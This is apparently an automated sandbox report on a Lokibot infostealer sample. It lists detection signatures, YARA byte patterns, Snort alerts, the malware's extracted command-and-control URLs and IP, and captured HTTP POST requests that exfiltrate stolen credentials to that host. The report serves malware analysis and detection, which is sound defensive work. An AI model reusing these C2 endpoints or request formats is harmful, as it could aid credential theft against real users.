Windows Analysis Report
PI#53034601506400.exe

Overview

General Information

Sample Name: PI#53034601506400.exe
Analysis ID: 708241
MD5: 05d1649e1b980b3d59b189a2fe07fc3c
SHA1: 9227eb122ce621fa3f7375c4a0ac4becd45b82c0
SHA256: 66f1a748e30aaa66b2053848270d68f5dc3ec9ccd4b9a5dbaa6a6dfd3139490c
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • PI#53034601506400.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\PI#53034601506400.exe" MD5: 05D1649E1B980B3D59B189A2FE07FC3C)
    • PI#53034601506400.exe (PID: 2312 cmdline: C:\Users\user\Desktop\PI#53034601506400.exe MD5: 05D1649E1B980B3D59B189A2FE07FC3C)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://162.0.223.13/?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Lokibot_1f885282 | unknown | unknown
  • 0x7f8d4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk

Source | Rule | Description | Author | Strings
0.2.PI#53034601506400.exe.2575394.3.unpack | Windows_Trojan_Lokibot_0f421617 | unknown | unknown
  • 0x2d563:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PI#53034601506400.exe.38976c0.9.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
0.2.PI#53034601506400.exe.38976c0.9.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0.2.PI#53034601506400.exe.38976c0.9.unpack | Windows_Trojan_Lokibot_1f885282 | unknown | unknown
  • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PI#53034601506400.exe.38976c0.9.unpack | Windows_Trojan_Lokibot_0f421617 | unknown | unknown
  • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6

No Sigma rule has matched
Timestamp: 09/23/22-07:58:29.454711
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2024317
Source Port: 49699
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-07:58:37.371596
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2024313
Source Port: 49701
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-07:58:37.371596
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2021641
Source Port: 49701
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-07:58:29.454711
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2021641
Source Port: 49699
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-07:58:29.454711
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2024312
Source Port: 49699
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-07:58:37.371596
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2024318
Source Port: 49701
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-07:58:35.112918
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2024312
Source Port: 49700
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-07:58:35.112918
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2021641
Source Port: 49700
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-07:58:35.112918
Source IP: 192.168.2.5
Destination IP: 162.0.223.13
SID: 2024317
Source Port: 49700
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://162.0.223.13/?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i"]}
Source: PI#53034601506400.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PI#53034601506400.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49699 -> 162.0.223.13:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49699 -> 162.0.223.13:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49699 -> 162.0.223.13:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49700 -> 162.0.223.13:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49700 -> 162.0.223.13:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49700 -> 162.0.223.13:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49701 -> 162.0.223.13:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49701 -> 162.0.223.13:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49701 -> 162.0.223.13:80
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor | URLs: http://162.0.223.13/?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i
Source: Joe Sandbox View | ASN Name: ACPCA ACPCA
Source: Joe Sandbox View | IP Address: 162.0.223.13 162.0.223.13
Source: global traffic | HTTP traffic detected:
    POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 162.0.223.13
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 9AC780C0
    Content-Length: 192
    Connection: close
Source: global traffic | HTTP traffic detected:
    POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 162.0.223.13
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 9AC780C0
    Content-Length: 192
    Connection: close
Source: global traffic | HTTP traffic detected:
    POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 162.0.223.13
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 9AC780C0
    Content-Length: 165
    Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 162.0.223.13
Source: PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://apache.org
Source: PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://centos.org
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://httpd.apache.org/
Source: PI#53034601506400.exe, 00000000.00000002.328171471.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.centos.org/
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: PI#53034601506400.exe, 00000000.00000003.312172741.0000000005A58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/pe.
Source: PI#53034601506400.exe, 00000000.00000003.312213384.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.312084396.0000000005A58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/pe.M
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: PI#53034601506400.exe, 00000000.00000003.325770393.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comgrita5
Source: PI#53034601506400.exe, 00000000.00000003.325770393.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comm
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308277205.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308234434.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnGg
Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnQ
Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnU
Source: PI#53034601506400.exe, 00000000.00000003.308277205.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308234434.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnion
Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cno_
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp//
Source: PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/5
Source: PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/I
Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0m
Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/d
Source: PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310333869.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: PI#53034601506400.exe, 00000000.00000003.306344407.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.306358549.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: PI#53034601506400.exe, 00000000.00000003.306344407.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.306358549.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com7
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: PI#53034601506400.exe, 00000000.00000003.311913695.0000000005A58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.de
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: PI#53034601506400.exe, 00000000.00000003.311913695.0000000005A58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deu4
Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | HTTP traffic detected:
    POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 162.0.223.13
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 9AC780C0
    Content-Length: 192
    Connection: close
Source: PI#53034601506400.exe, 00000000.00000002.326448349.0000000000788000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

Source: 0.2.PI#53034601506400.exe.2575394.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 | Author: unknown
Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 | Author: unknown
